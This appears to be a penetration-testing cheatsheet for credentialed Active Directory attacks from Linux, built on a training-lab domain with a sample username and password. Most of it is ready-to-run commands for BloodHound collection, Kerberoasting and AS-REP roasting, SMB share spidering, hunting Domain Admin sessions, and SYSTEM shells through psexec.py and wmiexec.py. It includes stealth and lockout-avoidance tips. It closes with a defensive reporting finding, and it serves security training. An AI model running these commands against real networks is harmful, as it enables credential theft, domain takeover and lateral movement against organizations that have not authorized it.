π‘οΈ Methodology Checklist
- Add DC to /etc/hosts:
echo "[DC_IP] [DC_FQDN]" >> /etc/hosts - BloodHound.py collection:
bloodhound-python -u [USER] -p [PASS] -d [DOMAIN] -ns [DC_IP] -c All - Windapsearch users:
windapsearch --dc-ip [DC_IP] -u [USER]@[DOMAIN] -p [PASS] --da - RPCclient enum:
rpcclient -U "[USER]%[PASS]" [DC_IP]βenumdomusers - GetUserSPNs (Kerberoast):
impacket-GetUserSPNs [DOMAIN]/[USER]:[PASS] -dc-ip [DC_IP] -request - GetNPUsers (ASREPRoast):
impacket-GetNPUsers [DOMAIN]/ -dc-ip [DC_IP] -no-pass -usersfile users.txt - Import BloodHound ZIP β analyse attack paths
π― Operational Context
Use when: You have valid AD credentials and a Linux pivot β map AD attack paths, enumerate GPOs, ACLs, and trust relationships before lateral movement.
Think Dumber First: bloodhound-python from your Linux box with creds gives you the entire domain attack graph in 5 minutes. Run it before any manual enumeration. Then ldapdomaindump for quick user/group tables.
Skip when: Credentials are service account with no LDAP read rights β fall back to anonymous/null session enumeration.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo nxc smb [DC_IP] -u [USER] -p [PASS] --users | List domain users with badpwdcount |
sudo nxc smb [DC_IP] -u [USER] -p [PASS] --groups | List domain groups with member counts |
sudo nxc smb [TARGET_IP] -u [USER] -p [PASS] --loggedon-users | Find active privileged sessions on a host |
sudo nxc smb [DC_IP] -u [USER] -p [PASS] --shares | Enumerate SMB shares with read/write perms |
sudo nxc smb [DC_IP] -u [USER] -p [PASS] -M spider_plus --share '[SHARE]' | Recursively list all readable files in a share |
smbmap -u [USER] -p [PASS] -d [DOMAIN] -H [TARGET_IP] | Check share permissions |
smbmap -u [USER] -p [PASS] -d [DOMAIN] -H [TARGET_IP] -R '[SHARE]' --dir-only | Recursive directory listing (folders only) |
rpcclient -U "[USER]" [DC_IP] β enumdomusers | List all domain users with hex RIDs |
rpcclient $> queryuser [RID_HEX] | Query detailed user info by RID |
psexec.py [DOMAIN]/[USER]:'[PASS]'@[TARGET_IP] | SYSTEM shell via ADMIN$ share executable upload |
wmiexec.py [DOMAIN]/[USER]:'[PASS]'@[TARGET_IP] | Semi-interactive WMI shell (no file drop, stealthier) |
python3 windapsearch.py --dc-ip [DC_IP] -u [USER]@[DOMAIN] -p [PASS] --da | Enumerate Domain Admins group members |
python3 windapsearch.py --dc-ip [DC_IP] -u [USER]@[DOMAIN] -p [PASS] -PU | Recursive search for privileged users in nested groups |
sudo bloodhound-python -u '[USER]' -p '[PASS]' -ns [DC_IP] -d [DOMAIN] -c all | Collect all BloodHound data from Linux |
zip -r ilfreight_bh.zip *.json | Zip BloodHound JSON output for GUI upload |
π¬ Deep Dive & Workflow
Prerequisite: Valid Credentials
This phase requires at least one of: cleartext password, NTLM hash, or SYSTEM access on a domain-joined host. With these, a low-privilege user can enumerate nearly the entire domain structure.
CrackMapExec Enumeration Workflow
# Step 1: Users + bad password counts (remove near-lockout users before spraying)
sudo nxc smb 172.16.5.5 -u forend -p Klmcargo2 --users
# Step 2: Groups + member counts (identify high-value targets)
sudo nxc smb 172.16.5.5 -u forend -p Klmcargo2 --groups
# Step 3: Active sessions on workstations (hunt for DA sessions)
sudo nxc smb 172.16.5.10 -u forend -p Klmcargo2 --loggedon-users
# Step 4: Share permissions
sudo nxc smb 172.16.5.5 -u forend -p Klmcargo2 --shares
# Step 5: File enumeration inside share
sudo nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'
# Output NOT shown in terminal β read from /tmp/cme_spider_plus/[IP].jsonSMBMap β Permission Audit
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5
# Drill into a specific share recursively
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-onlyrpcclient β RID/SID Queries
Domain SID + RID = unique object identifier. Built-in accounts have static RIDs across all domains:
- Administrator = RID 500 (0x1f4)
- Guest = RID 501
rpcclient -U "forend" 172.16.5.5
rpcclient $> enumdomusers # lists all users with hex RIDs
rpcclient $> queryuser 0x457 # detailed info for RID 0x457 (decimal 1111)RID math: If asked for decimal RID 1111, convert to hex (0x457) before querying.
Impacket Lateral Movement
# psexec.py β uploads random exe to ADMIN$, registers service β SYSTEM shell
psexec.py INLANEFREIGHT.LOCAL/forend:'Klmcargo2'@172.16.5.130
# wmiexec.py β WMI shell as local admin, no file dropped (stealthier)
# Each command spawns new cmd.exe β generates Event ID 4688
wmiexec.py INLANEFREIGHT.LOCAL/forend:'Klmcargo2'@172.16.5.130Windapsearch β LDAP
# Domain Admins
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@INLANEFREIGHT.LOCAL -p Klmcargo2 --da
# Privileged users via recursive nested group expansion
python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@INLANEFREIGHT.LOCAL -p Klmcargo2 -PUBloodHound from Linux
# Collect all data
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d INLANEFREIGHT.LOCAL -c all
# Package for GUI upload
zip -r ilfreight_bh.zip *.json
# Start Neo4j + BloodHound GUI
sudo neo4j start
bloodhoundUpload the zip or individual JSON files. Key queries: Find Shortest Path to Domain Admins, Find All Domain Admins, Find Computers with Unsupported Operating Systems.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| bloodhound-python fails with Kerberos error | Clock skew >5 minutes | Sync time: ntpdate -u [DC_IP] or timedatectl set-ntp true |
| ldapdomaindump returns empty | LDAP port filtered | Confirm port 389/636 open: nmap -p 389,636 [DC_IP]; try LDAPS if 389 filtered |
| BloodHound no attack paths shown | Wrong collection method | Re-run with -c All to collect all data types; DNS must resolve DC hostname |
| impacket-GetUserSPNs returns KDC_ERR_S_PRINCIPAL_UNKNOWN | Wrong domain format | Use FQDN: -dc-ip [DC_IP] [DOMAIN.TLD]/[USER]:[PASS] |
| LDAP queries rejected with βStrong Auth Requiredβ | LDAP signing enforced | Use LDAPS (port 636): add --use-ldaps flag to ldapdomaindump |
π Reporting Trigger
Finding Title: Active Directory Enumeration via Credentialed LDAP Query Impact: Valid credentials provide complete visibility into AD user accounts, group memberships, GPOs, ACLs, and Kerberoastable service accounts, enabling targeted privilege escalation without brute force. Root Cause: No LDAP query monitoring or alerting on bulk LDAP reads. Excessive AD read permissions granted to standard user accounts. Recommendation: Implement LDAP query auditing and alert on high-volume LDAP reads from non-privileged accounts. Apply least-privilege to AD read permissions. Deploy Microsoft Defender for Identity to detect reconnaissance activity.